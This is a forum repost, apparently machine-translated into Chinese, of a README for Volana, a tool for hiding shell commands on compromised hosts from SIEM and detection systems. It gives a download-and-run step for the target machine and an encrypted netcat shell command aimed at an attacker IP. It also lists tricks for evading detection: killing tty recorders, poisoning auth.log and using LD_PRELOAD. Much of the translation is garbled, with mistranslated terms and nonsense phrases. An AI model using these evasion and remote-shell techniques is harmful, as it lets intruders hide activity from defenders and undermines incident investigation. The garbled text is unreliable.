Volana -shell命令混淆以避免检测系统

https://hacker.bz/t/entry/61-volana-shell%E5%91%BD%E4%BB%A4%E6%B7%B7%E6%B7%86%E4%BB%A5%E9%81%BF%E5%85%8D%E6%A3%80%E6%B5%8B%E7%B3%BB%E7%BB%9F/

Followers

AVvXsEjwHywu1MIETxz4EH2PyiPK3380XzJ4D5Pw

shell命令混淆以避免SIEM/检测系统

在五旬节期间，一个重要方面是隐身。因此，您应该在通过后清除轨道。然而，许多基础架构日志命令并将其发送到SIEM，使其实时使之后单独清洁部分无用。Volana提供了一种简单的方法来隐藏在折衷的机器上执行的命令（通过提供self shell运行时）（输入您的命令，Volana为您执行您的命令）。像这样，您在通过期间清除了曲目

用法

您需要获得交互式外壳。（找到一种产生它的方法，您是黑客，这是您的工作！否则）。然后在目标机器上下载并启动它。就是这样，现在您可以键入要执行的命令

##从github发行

##如果您没有折衷的机器访问Internet，请找到另一种方式

curl -lo -l -l https://github.com/ariary/volana/releases/latest/download/volana

##执行它

./volana

##您现在处于雷达之下

Volana»Echo'Hi Siem团队！你找到我吗？ /dev/null 21＃您可以有点自大

volana»[命令] Volana Console: * RING:启用戒指模式即启动每个命令的关键字。

来自非交互式壳

想象一下您有一个非交互式外壳（Webshell或Blind RCE），您可以使用加密和解密子命令。以前，您需要使用嵌入式加密密钥构建Volana。

在攻击者机器上##用加密密钥构建Volana

制造构建。加入

##将其转移到目标（唯一可检测的命令）上

## [.]

##加密您要隐身执行的命令

##（这里是NC绑定以获得交互式外壳）

volana encr'nc [Attacker_ip] [Attacker_port] -e /bin /bash'

加密命令复制加密命令并使用您的RCE在目标机上执行。

##现在您有了一个绑定，生成它以使其具有互动性，并且通常使用Volana为隐形（./volana）。 +不要忘记在离开之前删除Volana二进制文件（原因是解密密钥可以很容易地从中检索）为什么不只是用echo [命令]隐藏命令| base64？并用echo [encoded_command]在目标上解码| base64 -d | bash

因为我们希望受到保护，免受触发基本64使用警报或寻求命令中的base64文本的系统。我们也希望使调查变得困难，而Base64并不是真正的刹车。

检测

请记住，Volana并不是一个使您完全看不见的奇迹。其目的是使入侵检测和调查更加努力。

通过检测，我们的意思是，如果执行某个命令，我们是否能够触发警报。

隐藏

只会捕获Volana发射命令线。 🧠但是，通过在执行它之前添加一个空间，默认的bash行为是不保存它

Detection systems that are based on history command output Detection systems that are based on history files .bash_history, '.zsh_history' etc . Detection systems that are based on bash debug traps Detection systems that are based on sudo built-in logging system Detection systems tracing all processes syscall system-wide (eg opensnoop) Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec,等等。）易于检测的避免3: pkill -9脚本不是常见的案例屏幕更难避免，但是它不会注册输入（秘密输入: stty -echo=避免避免）命令检测可以避免使用加密的VOLANA检测:01

可见

检测系统，该检测系统无法避免使用

Bug Bounty

的检测系统。 Not a common case Detection systems that are based on syslog files (e.g. /var/log/auth.log) Only for sudo or su commands syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info 'No hacker is povertyening your syslog solution, don't worry') Detection systems that are based on SYSCALL（例如AUDITD，LKML/EBPF）难以分析，可以通过使几种多样性SYSCALLS自定义LD_Preload注射以使Log并不是所有常见的情况3

信用

对您的010-1010的遗憾，但对于ClickBait标题而言，但不会为Contibutors提供任何钱，可以使LOG并不是一个常见的情况。

让我知道您是否找到了: *检测Volana *的一种方法，一种无法检测Volana命令*的间谍控制台*一种避免检测系统的方法

在这里报告

010-1010在控制台moonwalk:间谍的8种方法

Sign In

Volana -shell命令混淆以避免检测系统

shell命令混淆以避免SIEM/检测系统

用法

来自非交互式壳

检测

隐藏

可见

Bug Bounty

信用

0 Comments

Recommended Comments

Account

Navigation

Search